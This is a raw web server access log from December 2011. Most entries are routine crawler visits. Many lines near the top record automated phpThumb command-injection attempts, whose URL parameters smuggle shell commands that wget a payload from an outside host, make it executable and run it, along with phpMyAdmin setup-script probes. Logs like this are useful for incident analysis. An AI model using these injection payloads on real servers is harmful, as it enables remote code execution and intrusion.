200.63.96.126 - - [29/Dec/2011:07:58:37 +0100] "GET /common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 516 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
200.63.96.126 - - [29/Dec/2011:07:58:41 +0100] "GET /phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 506 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
200.63.96.126 - - [29/Dec/2011:07:58:44 +0100] "GET /libs/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 509 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
123.125.71.32 - - [29/Dec/2011:09:44:39 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
124.115.6.10 - - [29/Dec/2011:10:46:33 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Sosospider+(+http://help.soso.com/webspider.htm)"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /cms/plugins/content/jthumbs/includes/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 529 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 527 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 516 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 506 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /libs/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 509 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 527 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 527 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /gallery/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 512 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /wp-content/themes/victore/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 525 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 528 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 529 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 527 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 532 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /js/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 532 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /mambots/editors/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 546 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /admin/scripts/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 540 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /modules/phpThumb/phpThumb.php?src=phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /lib/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /manager/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 511 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /thumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 506 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /global/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 513 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /components/com_hotornot2/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 523 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /components/com_hotornot2/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 522 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 526 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 529 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /staticfiles/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 514 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /content/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 510 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /class/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 512 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /admin/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 510 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:51 +0100] "GET /phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 504 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:52 +0100] "GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 512 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:52 +0100] "GET /assets/components/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 519 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:52 +0100] "GET /components/com_alphacontent/assets/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 530 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:52 +0100] "GET /components/com_hotornot2/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 523 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:52 +0100] "GET /components/com_alphauserpoints/assets/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 529 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:52 +0100] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 534 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:52 +0100] "GET /zadmin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 535 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:52 +0100] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 529 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:52 +0100] "GET /components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 534 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.10.76 - - [29/Dec/2011:14:10:52 +0100] "GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 532 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
208.115.113.84 - - [29/Dec/2011:17:37:16 +0100] "GET /robots.txt HTTP/1.1" 404 472 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
208.115.113.84 - - [29/Dec/2011:17:59:34 +0100] "GET / HTTP/1.1" 200 298 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
66.249.71.1 - - [29/Dec/2011:18:50:32 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.1 - - [29/Dec/2011:18:50:32 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=11&catid=11&Itemid=37 HTTP/1.1" 200 2663 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.1 - - [30/Dec/2011:01:26:25 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=28 HTTP/1.1" 200 4701 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.52.104.88 - - [30/Dec/2011:02:28:42 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.204.168 - - [30/Dec/2011:02:29:57 +0100] "GET / HTTP/1.1" 200 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko)"
88.191.95.247 - - [30/Dec/2011:02:31:45 +0100] "GET /muieblackcat HTTP/1.1" 404 468 "-" "-"
88.191.95.247 - - [30/Dec/2011:02:31:45 +0100] "GET //scripts/setup.php HTTP/1.1" 404 470 "-" "-"
88.191.95.247 - - [30/Dec/2011:02:31:45 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 403 479 "-" "-"
88.191.95.247 - - [30/Dec/2011:02:31:45 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 477 "-" "-"
88.191.95.247 - - [30/Dec/2011:02:31:45 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 473 "-" "-"
88.191.95.247 - - [30/Dec/2011:02:31:45 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 475 "-" "-"
77.88.24.28 - - [30/Dec/2011:02:44:05 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
123.125.71.52 - - [30/Dec/2011:05:56:09 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
50.23.23.81 - - [30/Dec/2011:06:07:51 +0100] "GET / HTTP/1.1" 200 298 "-" "Mozilla/5.0 (Linux; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
50.23.23.81 - - [30/Dec/2011:06:08:00 +0100] "GET / HTTP/1.1" 200 316 "-" "Mozilla/5.0 (Linux; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
204.236.214.204 - - [30/Dec/2011:06:08:01 +0100] "GET / HTTP/1.1" 200 298 "-" "-"
77.88.24.28 - - [30/Dec/2011:06:25:00 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
50.16.11.169 - - [30/Dec/2011:06:50:12 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
123.125.67.212 - - [30/Dec/2011:07:25:06 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
66.249.71.1 - - [30/Dec/2011:07:57:49 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.1 - - [30/Dec/2011:07:57:49 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=52 HTTP/1.1" 200 3568 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.115.11.187 - - [30/Dec/2011:10:10:02 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [30/Dec/2011:10:27:07 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [30/Dec/2011:10:29:37 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.10.193 - - [30/Dec/2011:10:31:48 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [30/Dec/2011:10:48:32 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.6.10 - - [30/Dec/2011:12:23:27 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Sosospider+(+http://help.soso.com/webspider.htm)"
66.249.71.1 - - [30/Dec/2011:13:52:25 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=category&id=19&layout=blog&Itemid=56&limitstart=20 HTTP/1.1" 200 3901 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.1 - - [30/Dec/2011:14:05:23 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=category&layout=blog&id=19&Itemid=56&limitstart=20 HTTP/1.1" 200 3894 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.80.194.28 - - [30/Dec/2011:14:27:12 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.0.3705; Media Center PC 3.1)"
95.108.151.244 - - [30/Dec/2011:14:52:36 +0100] "GET /robots.txt HTTP/1.1" 404 528 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
